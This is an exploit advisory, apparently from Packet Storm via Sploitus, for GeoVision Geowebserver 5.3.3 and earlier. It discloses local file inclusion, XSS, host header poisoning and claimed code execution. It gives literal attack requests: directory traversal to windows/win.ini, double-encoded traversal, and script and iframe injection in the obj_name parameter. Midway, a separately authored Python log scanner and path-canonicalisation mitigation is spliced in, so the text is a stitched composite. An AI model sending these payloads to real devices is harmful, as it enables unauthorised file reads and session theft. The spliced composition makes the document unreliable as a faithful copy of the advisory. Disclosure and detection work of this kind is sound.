## https://sploitus.com/exploit?id=PACKETSTORM:163860
# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE  
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM  
# Date: 6-16-21 (Vendor Notified)  
# Exploit Author: Ken 's1ngular1ty' Pyle  
# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php  
# Version: <= 5.3.3  
# Tested on: Windows 20XX / MULTIPLE  
# CVE : https://www.geovision.com.tw/cyber_security.php  
  
GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code Execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client-side exploitation, including session theft:  
  
Nested Exploitation of the LFI, XSS, HTML / Browser Injection:  
  
GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1  
  
Absolute exploitation of the LFI:  
  
POST /Visitor/bin/WebStrings.srf?obj_name=win.ini  
  
GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini  
  
Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.  
  
  
ex. obj_name=INJECTEDHTML / XSS  
  
The application fails to properly enforce permissions and sanitize user requests. This allows for LFI / Remote Code Execution through several vectors:  
  
ex. /Visitor//%252e(path to target)  
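The request lines above rely on two things a defender can check for: multiply URL-encoded traversal sequences (`%252e%252e%252f` decodes to `%2e%2e%2f` and then to `../`) and HTML tags reflected through `obj_name`. The following is an added example, not code from the advisory or from GeoVision. It decodes request targets until they stop changing, flags traversal and tag injection in constructed access-log lines modelled on the advisory's requests, and shows the server-side check (canonicalise, then confirm the result stays under the web root) that would have refused the `file=` traversal. The web root `/var/www/Visitor`, the log lines and the rule names are all assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log request lines. The first two mirror the
# advisory's traversal / tag-injection requests; the last two are benign-looking
# requests to the same endpoint (hosts, timestamps and filenames are made up).
SAMPLE_LOG = [
    'GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
    '&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1',
    'GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\\win.ini HTTP/1.1',
    'GET /Visitor/bin/WebStrings.srf?file=strings.xml&obj_name=title HTTP/1.1',
    'POST /Visitor/bin/WebStrings.srf?obj_name=win.ini HTTP/1.1',
]

# "../" (or a trailing "..") anywhere in the decoded target, after backslashes
# have been folded to forward slashes so "..\" is caught as well.
TRAVERSAL = re.compile(r"\.\.(?:/|$)")
# Opening or closing tags commonly used for reflected HTML / script injection.
HTML_TAG = re.compile(r"<\s*/?\s*(script|iframe|img|svg|object|embed)\b", re.I)


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly until the string stops changing.

    One round turns %252e into %2e; the second turns %2e into '.', which is
    exactly how a double-encoded "../" slips past a single-decode filter.
    max_rounds bounds the loop against pathological inputs.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(log_line):
    """Return the set of rule names that fire for one request line."""
    parts = log_line.split(" ", 2)  # METHOD TARGET VERSION
    if len(parts) < 2:
        return set()
    target = fully_decode(parts[1]).replace("\\", "/")
    findings = set()
    if TRAVERSAL.search(target):
        findings.add("traversal")
    if HTML_TAG.search(target):
        findings.add("html_injection")
    return findings


def scan_log(lines):
    """Return (line_number, findings) for each line that triggered a rule."""
    results = []
    for number, line in enumerate(lines, 1):
        findings = classify_request(line)
        if findings:
            results.append((number, findings))
    return results


def safe_resolve(web_root, requested):
    """Server-side mitigation: canonicalise the requested file and refuse
    anything that resolves outside web_root. Returns the POSIX path or None.

    posixpath is used so the check runs the same on any platform; a real
    deployment would additionally realpath() the result to defeat symlinks.
    """
    decoded = fully_decode(requested).replace("\\", "/")
    if "\x00" in decoded or decoded == "":
        return None
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {sorted(findings)}")
    print(safe_resolve("/var/www/Visitor", "bin/strings.xml"))
    print(safe_resolve("/var/www/Visitor", "%252e%252e%252fwindows\\win.ini"))
```

Note what the pattern rules do not catch: the fourth sample line (`obj_name=win.ini`) contains neither traversal characters nor tags, so syntactic log matching alone says nothing about it. Whether such a request is acceptable is a question for the server's own access control, which is why the `safe_resolve` style of check belongs in the application and not only in the log pipeline.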
  
These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:  
  
The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.  
  
These attacks were disclosed as part of the IOTVillage Presentation:  
  
https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4